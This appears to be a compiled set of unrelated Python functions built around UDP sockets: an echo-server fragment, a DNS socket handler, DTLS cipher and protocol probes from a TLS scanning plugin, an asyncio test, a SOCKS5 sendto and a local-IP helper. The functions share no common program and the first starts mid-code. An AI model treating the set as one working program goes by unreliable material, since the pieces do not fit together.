    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.bind(orig)
        while True:
            # Receive one datagram.
            data, address = sock.recvfrom(MAX_BYTES)
            text = data.decode(ENCODE)  # bytes -> text
            print(address, text)

            # Send the reply.
            text = "Total de dados recebidos: " + str(len(data))
            data = text.encode(ENCODE)  # text -> bytes
            sock.sendto(data, address)
def __init__(self, address, callback, host, port, device_type=None, backend='auto', interface=None):
    """Store the connection settings, open a UDP socket and pick a backend.

    ``backend='auto'`` selects ``'gatt'`` when ``platform`` is ``"linux"``
    or ``"linux2"`` and ``'bgapi'`` otherwise; ``'gatt'`` and ``'bgapi'``
    are taken as given.

    Raises:
        ValueError: for any other ``backend`` value.
    """
    self.address = address
    self.callback = callback
    self.device_type = device_type
    self.interface = interface
    self.HOST = host  # e.g. '192.168.1.118'
    self.PORT = port  # e.g. 9999
    self.s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    if backend == 'auto':
        self.backend = 'gatt' if platform in ("linux", "linux2") else 'bgapi'
    elif backend in ['gatt', 'bgapi']:
        self.backend = backend
    else:
        raise ValueError('Backend must be auto, gatt or bgapi')
def handle_event(self, sock, fd, event):
    """Handle an event-loop notification for the DNS socket.

    Events for any socket other than ``self._sock`` are ignored. On
    ``POLL_ERR`` the socket is closed and replaced by a fresh non-blocking
    UDP socket registered for ``POLL_IN``. Otherwise one datagram is read
    and passed to ``self._handle_data`` unless its sender host is unknown.
    """
    if sock != self._sock:
        return
    if event & eventloop.POLL_ERR:
        logging.error('dns socket err')
        self._loop.remove(self._sock)
        self._sock.close()
        # TODO when dns server is IPv6
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
                                   socket.SOL_UDP)
        self._sock.setblocking(False)
        self._loop.add(self._sock, eventloop.POLL_IN, self)
    else:
        data, addr = sock.recvfrom(1024)
        # Only the host part of the sender address is checked.
        if addr[0] not in self._servers:
            # logging.warn is a deprecated alias of logging.warning.
            logging.warning('received a packet other than our dns')
            return
        self._handle_data(data)
def _test_dtls_ciphersuite(self, server_connectivity_info, dtls_version, cipher, port):
    """Check whether the server accepts one cipher suite over DTLS.

    Used by worker threads; performs a single DTLS handshake restricted to
    ``cipher``.

    Args:
        server_connectivity_info (ServerConnectivityInfo): connection
            details; ``ip_address`` is used as the destination.
        dtls_version (str): protocol version passed to ``SSL.Context``.
        cipher (str): OpenSSL short name of the cipher suite.
        port (int): destination port.

    Returns:
        ``AcceptCipher`` when the handshake succeeds, ``RejectCipher``
        (carrying the error text) when it fails with ``SSL.Error``.
    """
    cnx = SSL.Context(dtls_version)
    cnx.set_cipher_list(cipher)
    conn = SSL.Connection(cnx, socket.socket(socket.AF_INET, socket.SOCK_DGRAM))
    try:
        conn.connect((server_connectivity_info.ip_address, port))
        conn.do_handshake()
    except SSL.Error as e:
        # ``e[0]`` only works on Python 2; ``e.args[0]`` is the same value
        # and works on both. Index [0][2] picks the third field of the
        # first error entry.
        error_msg = e.args[0][0][2]
        cipher_result = RejectCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher], error_msg)
    else:
        cipher_result = AcceptCipher(TLS_OPENSSL_TO_RFC_NAMES_MAPPING[cipher])
    finally:
        conn.shutdown()
        conn.close()
    return cipher_result
def test_dtls_protocol_support(self, server_connectivity_info, dtls_version, port):
    """Test whether the server supports a DTLS protocol version.

    Args:
        server_connectivity_info (ServerConnectivityInfo): connection
            details; ``ip_address`` is used as the destination.
        dtls_version (str): DTLS protocol version to test.
        port (int): destination port.

    Returns:
        bool: ``True`` when the handshake succeeds, ``False`` when it fails
        with an ``SSL.SysCallError`` other than "connection refused".

    Raises:
        ValueError: the connection was refused, i.e. the port is wrong.
    """
    # Local import keeps this block self-contained.
    import errno

    cnx = SSL.Context(dtls_version)
    cnx.set_cipher_list('ALL:COMPLEMENTOFALL')
    conn = SSL.Connection(cnx, socket.socket(socket.AF_INET, socket.SOCK_DGRAM))
    try:
        conn.connect((server_connectivity_info.ip_address, port))
        conn.do_handshake()
    except SSL.SysCallError as ex:
        # ``ex[0]`` only works on Python 2; ``ex.args[0]`` works on both.
        # errno.ECONNREFUSED equals the former literal 111 on Linux and is
        # also correct on platforms that number it differently.
        if ex.args[0] == errno.ECONNREFUSED:
            raise ValueError('LuckyThirteenVulnerabilityTesterPlugin: It is entered wrong port for DTLS connection.')
        else:
            support = False
    else:
        support = True
    finally:
        conn.shutdown()
        conn.close()
    return support
def test_sock_connect_address(self):
    """sock_connect() must reject unresolved addresses in debug mode."""
    # With debug enabled the loop is expected to verify that the address
    # has already been resolved (_check_resolved_address()).
    self.loop.set_debug(True)

    unresolved = ('www.python.org', 80)
    cases = [(socket.AF_INET, unresolved)]
    if support.IPV6_ENABLED:
        cases.append((socket.AF_INET6, unresolved))
        cases.append((socket.AF_INET6, ('www.python.org', 80, 0, 0)))

    kinds = (socket.SOCK_STREAM, socket.SOCK_DGRAM)
    for family, address in cases:
        for kind in kinds:
            with socket.socket(family, kind) as sock:
                sock.setblocking(False)
                pending = self.loop.sock_connect(sock, address)
                with self.assertRaises(ValueError) as caught:
                    self.loop.run_until_complete(pending)
                self.assertIn('address must be resolved',
                              str(caught.exception))
def sendto(self, bytes, *args, **kwargs):
    """Send a datagram, prefixing it with a SOCKS5 UDP header.

    Non-datagram sockets delegate straight to ``_BaseSocket.sendto``. The
    last positional argument is the destination address; anything before it
    is passed through as flags.

    Returns:
        Bytes sent as reported by ``send`` minus the header length.
    """
    if self.type != socket.SOCK_DGRAM:
        return _BaseSocket.sendto(self, bytes, *args, **kwargs)

    if not self._proxyconn:
        self.bind(("", 0))

    destination, send_flags = args[-1], args[:-1]

    packet_header = BytesIO()
    packet_header.write(b"\x00\x00")  # RSV (reserved)
    packet_header.write(b"\x00")      # STANDALONE (fragment number 0)
    self._write_SOCKS5_address(destination, packet_header)

    datagram = packet_header.getvalue() + bytes
    sent = _BaseSocket.send(self, datagram, *send_flags, **kwargs)
    return sent - packet_header.tell()
def get_local_ip():
    """Try to determine the local IP address of the machine.

    A UDP socket is "connected" to Google Public DNS and the local address
    chosen for it is returned. On a socket error the address the local
    hostname resolves to is returned instead.

    Returns:
        str: the local IP address.
    """
    # Pre-bind the name so ``finally`` is safe even when socket.socket()
    # itself raises; previously that produced an UnboundLocalError.
    sock = None
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

        # Use Google Public DNS server to determine own IP
        sock.connect(('8.8.8.8', 80))

        return sock.getsockname()[0]
    except socket.error:
        return socket.gethostbyname(socket.gethostname())
    finally:
        if sock is not None:
            sock.close()

# Taken from http://stackoverflow.com/a/23728630